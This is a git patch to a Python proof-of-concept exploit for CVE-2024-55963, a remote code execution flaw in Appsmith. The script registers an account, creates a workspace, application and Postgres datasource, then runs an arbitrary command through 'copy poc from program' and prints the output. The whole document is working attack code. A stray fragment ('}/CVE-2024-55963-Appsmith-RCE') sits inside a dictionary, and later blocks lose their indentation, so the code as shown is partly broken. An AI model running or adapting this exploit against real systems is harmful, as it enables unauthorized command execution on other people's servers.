From 3aee300f9e9265decde711db7922686db043a170 Mon Sep 17 00:00:00 2001 From: Nishanth Anand Date: Thu, 3 Apr 2025 10:48:42 +0530 Subject: [PATCH] Updating PoC.py for AppSmith RCE This PR enhances the proof of concept exploit for CVE-2024-55963 with several key improvements: - Added proper argument parsing with argparse for better usability - Implemented robust error handling with HTTP status validation - Fixed syntax errors and improved code structure - Added URL validation and automatic http:// prefix - Enhanced error messaging and output formatting - Fixed authentication flow and request sequence --- CVE-2024-55963/poc.py | 342 +++++++++++++++++++++--------------------- 1 file changed, 171 insertions(+), 171 deletions(-) diff --git a/CVE-2024-55963/poc.py b/CVE-2024-55963/poc.py index 87d9d64..e58c610 100644 --- a/CVE-2024-55963/poc.py +++ b/CVE-2024-55963/poc.py @@ -1,23 +1,24 @@ import requests import json -import sys -import time import pyfiglet +import argparse # Create a banner using pyfiglet banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title print(banner) -# Ensure the correct number of command-line arguments -if len(sys.argv) < 3: - print("Usage: python3 poc.py ") - sys.exit(1) - -# Get the base URL and command from the command line arguments -base_url = sys.argv[1] -command_arg = sys.argv[2] +# Set up argument parser +parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept') +parser.add_argument('-u', '--url', required=True, help='Base URL of the target') +parser.add_argument('command', nargs='?', default='id', help='Command to execute') +args = parser.parse_args() +# Get the base URL and command from the parsed arguments +base_url = args.url +command_arg = args.command +if not base_url.startswith("http://") and not base_url.startswith("https://"): + base_url = "http://" + base_url # Signup request signup_url = f"{base_url}/api/v1/users" @@ -25,8 +26,9 @@ "email": "poc1@poc.com", "password": "Testing123!" } -print ('Signing up...') +print('Signing up...') signup_response = requests.post(signup_url, data=signup_data) +signup_response.raise_for_status() # Login request login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed @@ -48,8 +50,9 @@ } # Make the login request without following redirects -print ('Logging in...') +print('Logging in...') login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False) +login_response.raise_for_status() # Capture the 'Set-Cookie' header if it exists set_cookie = login_response.headers.get('Set-Cookie') @@ -58,9 +61,9 @@ cookie_name, cookie_value = set_cookie.split(';')[0].split('=') # Fourth request to create a new workspace -print ('Creating a new workspace...') +print('Creating a new workspace...') if set_cookie: - fourth_request_url = f"{base_url}/api/v1/workspaces" # Replace with your actual URL + fourth_request_url = f"{base_url}/api/v1/workspaces" fourth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -73,18 +76,19 @@ "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } - fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) # JSON data for the new workspace + fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data) + fourth_response.raise_for_status() # Extract the 'id' from the response if it exists try: - response_json = fourth_response.json() # Attempt to parse the response as JSON - workspace_id = response_json.get("data", {}).get("id") # Get the 'id' from the 'data' field + response_json = fourth_response.json() + workspace_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging if workspace_id: - fifth_request_url = f"{base_url}/api/v1/applications" # Create a new application + fifth_request_url = f"{base_url}/api/v1/applications" fifth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -101,44 +105,44 @@ fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None}) - print ('Creating a new application...') + print('Creating a new application...') fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data) + fifth_response.raise_for_status() try: - response_json = fifth_response.json() # Attempt to parse the response as JSON - application_id = response_json.get("data", {}).get("id") # Get the 'id' from the 'data' field + response_json = fifth_response.json() + application_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fifth_response.text) # Sixth request to get workspace details - if workspace_id: # Ensure workspace_id is available - sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" # Use the new workspace ID + if workspace_id: + sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" sixth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", - "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", # Use your actual anonymous user ID + "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } print('Getting workspace details...') sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers) + sixth_response.raise_for_status() # Extract all plugin IDs from the response try: - response_json = sixth_response.json() # Attempt to parse the response as JSON + response_json = sixth_response.json() plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])] - - # Loop through each plugin ID for the seventh request print(f'Searching for vulnerable postgres database...') for plugin_id in plugin_ids: # Seventh request to get the form data for the plugin - seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" # Adjust the URL as needed + seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" seventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", @@ -150,56 +154,64 @@ "Cookie": f"{cookie_name}={cookie_value}", } - - seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) - - # Extracting the port value from the seventh response try: - seventh_response_json = seventh_response.json() # Attempt to parse the response as JSON - # Check if 'data' and 'form' exist in the response - if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: - form_data = seventh_response_json['data']['form'] - # Check for the presence of "postgres" in the response - if any("postgres" in str(item) for item in form_data): - print(f"Vulnerable postgres database found.") - break # Exit the loop if found - else: - pass # Fail silently - except (ValueError, IndexError) as e: - pass # Fail silently + seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) + seventh_response.raise_for_status() + + # Extracting the port value from the seventh response + try: + seventh_response_json = seventh_response.json() + if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: + form_data = seventh_response_json['data']['form'] + if any("postgres" in str(item) for item in form_data): + print(f"Vulnerable postgres database found.") + break + else: + pass + except (ValueError, IndexError) as e: + pass + except requests.exceptions.HTTPError as e: + print(f"Error checking plugin {plugin_id}: {e}") + continue # Proceed to request 8 after finding "postgres" if "postgres" in str(seventh_response_json): - eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" # Use the workspace_id - eighth_request_headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language": "en-US,en;q=0.5", - "Accept-Encoding": "gzip, deflate", - "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", # Use your actual anonymous user ID - "Connection": "keep-alive", - "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie - } - - print('Getting the workspace details...') - eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) - - # Extracting the workspace ID from the eighth response try: - eighth_response_json = eighth_response.json() # Attempt to parse the response as JSON - workspace_data = eighth_response_json.get("data", [{}])[0] # Get the first item in the data list - workspace_id_value = workspace_data.get("id") # Extract the 'id' from the workspace data - except (ValueError, IndexError): - print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) # Print the raw response for debugging - + # Try the environments API endpoint + eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" + eighth_request_headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", + "Connection": "keep-alive", + "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", + "Cookie": f"{cookie_name}={cookie_value}", + } + + print('Getting the workspace details...') + eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) + eighth_response.raise_for_status() + + # Extracting the workspace ID from the eighth response + try: + eighth_response_json = eighth_response.json() + workspace_data = eighth_response_json.get("data", [{}])[0] + workspace_id_value = workspace_data.get("id") + except (ValueError, IndexError): + print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) + except requests.exceptions.HTTPError as e: + # If the environments API fails, use the workspace ID we already have + print(f"Could not fetch environment details: {e}") + print("Using existing workspace ID for datasource creation...") + workspace_id_value = workspace_id except (ValueError, IndexError): - print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # Print the raw response for debugging - + print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # After the eighth request to get workspace details - if workspace_id_value: # Ensure workspace_id_value is available - ninth_request_url = f"{base_url}/api/v1/datasources" # URL for creating a new datasource + if workspace_id_value: + ninth_request_url = f"{base_url}/api/v1/datasources" ninth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", @@ -207,18 +219,17 @@ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", # Use your actual anonymous user ID + "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } - # Request body for creating a new datasource ninth_request_data = { "pluginId": plugin_id, "datasourceStorages": { - workspace_id_value: { # Use the extracted workspace ID value + workspace_id_value: { "datasourceConfiguration": { "properties": [None, {"key": "Connection method", "value": "STANDARD"}], "connection": { @@ -234,29 +245,29 @@ } }, "datasourceId": "", - "environmentId": workspace_id_value, # Same as the extracted workspace ID value + "environmentId": workspace_id_value, "isConfigured": True } }, "name": "Untitled datasource 1", - "workspaceId": workspace_id # Same as the extracted workspace ID value + "workspaceId": workspace_id } - # Make the POST request to create the datasource - print ('Connecting to vulnerable postgres database...') + print('Connecting to vulnerable postgres database...') ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data) + ninth_response.raise_for_status() # Extracting the ID from the response try: - ninth_response_json = ninth_response.json() # Attempt to parse the response as JSON - datasource_id = ninth_response_json.get("data", {}).get("id") # Extract the 'id' from the response + ninth_response_json = ninth_response.json() + datasource_id = ninth_response_json.get("data", {}).get("id") except (ValueError, KeyError): - print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # Print the raw response for debugging + print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # After the ninth request to create the datasource - if datasource_id: # Ensure datasource_id is available + if datasource_id: # 10th Request - tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id + tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" tenth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -264,27 +275,25 @@ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } - # Request body for schema preview tenth_request_data = { "title": "SELECT", "body": "create table poc (column1 TEXT);", "suggested": True } - # Print statement before the 10th request print("Creating the table 'poc'...") - # Make the POST request to preview the schema for the 10th request tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data) + tenth_response.raise_for_status() # 11th Request - eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id + eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" eleventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -292,100 +301,91 @@ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } - # Request body for the 11th schema preview using the command argument eleventh_request_data = { "title": "SELECT", - "body": f"copy poc from program '{command_arg}';", # Use the command argument + "body": f"copy poc from program '{command_arg}';", "suggested": True - } + }/CVE-2024-55963-Appsmith-RCE - # Print statement before the 11th request print("Running command...") - # Make the POST request for the 11th schema preview - eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) - - # 12th Request - twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id - twelfth_request_headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language": "en-US,en;q=0.5", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/json", - "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID - "Origin": base_url, - "Connection": "keep-alive", - "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie - } - - # Request body for the 12th schema preview - twelfth_request_data = { - "title": "SELECT", - "body": "select * from poc;", - "suggested": True - } +eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) +eleventh_response.raise_for_status() + +# 12th Request +twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id +twelfth_request_headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/json", + "X-Requested-By": "Appsmith", + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "Origin": base_url, + "Connection": "keep-alive", + "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", + "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie +} - # Print statement before the 12th request - print("Reading command output from poc table...\n") - - # Make the POST request for the 12th schema preview - twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) +# Request body for the 12th schema preview +twelfth_request_data = { + "title": "SELECT", + "body": "select * from poc;", + "suggested": True +} - # Extracting and printing the response from the 12th schema preview - try: - twelfth_response_json = twelfth_response.json() - - # Extracting the specific data - body_data = twelfth_response_json.get("data", {}).get("body", []) - column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values - print("Command output:") - print("----------------------------------------") - for value in column1_values: - - print(value) # Print each column1 value - print("----------------------------------------\n") +# Print statement before the 12th request +print("Reading command output from poc table...\n") - except (ValueError, KeyError): - print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging - - # After the 12th request to preview the schema - if datasource_id: # Ensure datasource_id is available - # Cleanup Request - cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id - cleanup_request_headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language": "en-US,en;q=0.5", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/json", - "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID - "Origin": base_url, - "Connection": "keep-alive", - "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie - } - - # Request body for cleanup - cleanup_request_data = { - "title": "SELECT", - "body": "DROP TABLE poc;", # Command to drop the table - "suggested": True - } +# Make the POST request for the 12th schema preview +twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) - # Make the POST request for the cleanup - print ('\nDropping the table...') - cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data) +# Extracting and printing the response from the 12th schema preview +try: + twelfth_response_json = twelfth_response.json() + + # Extracting the specific data + body_data = twelfth_response_json.get("data", {}).get("body", []) + column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values + print("Command output:") + print("----------------------------------------") + for value in column1_values: + print(value) # Print each column1 value + print("----------------------------------------\n") + +except (ValueError, KeyError): + print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging + +# Cleanup Request +cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id +cleanup_request_headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/json", + "X-Requested-By": "Appsmith", + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "Origin": base_url, + "Connection": "keep-alive", + "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", + "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie +} - # Assuming datasource_id is defined somewhere in your code - +# Request body for cleanup +cleanup_request_data = { + "title": "SELECT", + "body": "DROP TABLE poc;", # Command to drop the table + "suggested": True +} +# Make the POST request for the cleanup +print('\nDropping the table...') +cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)